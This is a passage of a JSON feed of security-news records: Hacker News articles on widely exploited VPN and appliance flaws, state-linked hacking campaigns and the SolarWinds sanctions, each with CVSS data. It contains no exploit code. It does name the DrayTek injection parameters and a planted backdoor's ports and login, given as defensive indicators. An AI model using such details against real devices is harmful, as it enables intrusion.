([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy 
([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and 
organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also enabled the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). 
\n \nClearSky noted that the hacking groups were able to gain access to the targets' core systems, drop additional malware, and spread laterally across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \nUpon gaining an initial foothold, the compromised systems were found to communicate with attacker-controlled command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors used tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke-TheHash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and move laterally across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-forcing them by logging in with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce they gained lateral movement capabilities, the attackers moved to the final stage: executing the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. 
\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) to communicate with the servers located inside the target network and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (\"Chafer\"). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, critical systems should also be monitored continuously and kept up to date. 
Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-01T16:21:29", "description": "Cybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as **XE Group**.\n\nAccording to 
[Menlo Security](<https://www.menlosecurity.com/blog/not-your-average-joe-an-analysis-of-the-xegroups-attack-techniques/>), which pieced together the information from different online sources, \"Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group.\"\n\nXE Group (aka XeThanh), previously documented by [Malwarebytes](<https://www.malwarebytes.com/blog/news/2020/07/credit-card-skimmer-targets-asp-net-sites>) and [Volexity](<https://www.volexity.com/blog/2021/12/07/xe-group-exposed-8-years-of-hacking-card-skimming-for-profit/>), has a history of carrying out cybercriminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin.\n\nThe entities targeted by the threat actor include government agencies, construction organizations, and the healthcare sector.\n\nIt's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password-stealing or [credit card skimming code](<https://thehackernews.com/2023/04/attention-online-shoppers-dont-be.html>) for online services.\n\n\"As far back as 2014, the threat actor was seen creating [AutoIT scripts](<https://en.wikipedia.org/wiki/AutoIt>) that automatically generated emails and a rudimentary credit card validator for stolen credit cards,\" the cybersecurity company said.\n\nEarlier this March, U.S. 
cybersecurity and intelligence authorities [revealed](<https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html>) XE Group's attempts to exploit a critical three-year-old security flaw in Progress Telerik devices (CVE-2019-18935, CVSS score: 9.8) to obtain a foothold.\n\nThe adversary has also attempted to gain access to corporate networks in the past through phishing emails sent out using fraudulent domains mimicking legitimate companies such as PayPal and eBay.\n\nBesides camouflaging .EXE files as .PNG files to avoid detection, select attacks have employed a web shell dubbed [ASPXSpy](<https://attack.mitre.org/software/S0073/>) to gain control of vulnerable systems.\n\n\"XE Group remains a continued threat to various sectors, including government agencies, construction organizations, and healthcare providers,\" the researchers said.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-01T14:55:00", "type": "thn", "title": "Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2023-06-01T14:55:37", "id": "THN:E9A6FFB34DA1C49F512A7AE269951D50", "href": "https://thehackernews.com/2023/06/unmasking-xe-group-experts-reveal.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:20", "description": "The U.S. and U.K. 
on Thursday formally attributed the supply chain attack on IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian intelligence services.\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. 
\"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value 
accounts and assets.\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy on or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. 
agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), the Departments of State, Justice, Commerce, Homeland Security, Energy, and Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 
2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", 
"CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S. and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. 
sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for the SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne out by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agencies noted.\n\nOther tactics used by APT29 include password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual 
property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). The actor also obtains virtual private servers using false identities and cryptocurrency payments, and relies on temporary VoIP telephone numbers and on email accounts from an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:32", "description": "Cybersecurity researchers with Qihoo 360's NetLab today unveiled details of two recently spotted zero-day cyberattack campaigns in 
the wild targeting enterprise-grade networking devices manufactured by Taiwan-based DrayTek. \n \nAccording to the [report](<https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/>), at least two separate groups of hackers exploited two critical remote command injection vulnerabilities (**CVE-2020-8515**) affecting DrayTek Vigor enterprise switches, load balancers, routers and VPN gateway devices to eavesdrop on network traffic and install backdoors. \n \nThe zero-day attacks started at the end of last November or the beginning of December and are potentially still ongoing against thousands of publicly exposed **DrayTek switches** and **Vigor 2960, 3900, 300B** devices that haven't yet been patched with the latest [firmware updates](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) released last month. \n \nThe zero-day vulnerabilities in question can be exploited by unauthenticated remote attackers to inject and execute arbitrary commands on the system, as also [detailed](<https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html>) by a separate researcher on his blog. \n \n\"The two 0-day vulnerability command injection points are keyPath and rtick, located in the /www/cgi-bin/mainfunction.cgi, and the corresponding Web Server program is /usr/sbin/lighttpd,\" the report says. 
\n \nNetLab researchers have not yet attributed either attack to a specific group, but they did confirm that while the first group simply spied on network traffic, the second group used the rtick command injection vulnerability to create: \n \n\n\n * a web-session backdoor that never expires,\n * an SSH backdoor on TCP ports 22335 and 32459,\n * a system backdoor account with user \"wuwuhanhan\" and password \"caonimuqin.\"\n \nNote that installing the patched firmware, whether you did so recently or are doing so now, will not automatically remove the backdoor accounts if you are already compromised. \n \n\"We recommend that DrayTek Vigor users check and update their firmware in a timely manner and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc. on their systems.\" \n \n\"If you have remote access enabled on your router, disable it if you don't need it, and use an access control list if possible,\" the company suggests. \n \nThe list of affected firmware versions is as follows: \n \n\n\n * Vigor2960 < v1.5.1\n * Vigor300B < v1.5.1\n * Vigor3900 < v1.5.1\n * VigorSwitch20P2121 <= v2.3.2\n * VigorSwitch20G1280 <= v2.3.2\n * VigorSwitch20P1280 <= v2.3.2\n * VigorSwitch20G2280 <= v2.3.2\n * VigorSwitch20P2280 <= v2.3.2\n \nAffected companies and individuals are strongly advised to install the latest firmware updates to protect their networks against malware and emerging online threats. \n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-27T21:22:00", "type": "thn", "title": "Hackers Exploit Zero-Day Bugs in Draytek Devices to Target Enterprise Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-29T18:22:23", "id": "THN:7312C296214FCDE145DA02B933FB28F6", "href": "https://thehackernews.com/2020/03/draytek-network-hacking.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "Intelligence agencies in Australia, the U.K., and the U.S. 
issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private network (VPN), and cloud-based technologies, and cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 BIG-IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - 
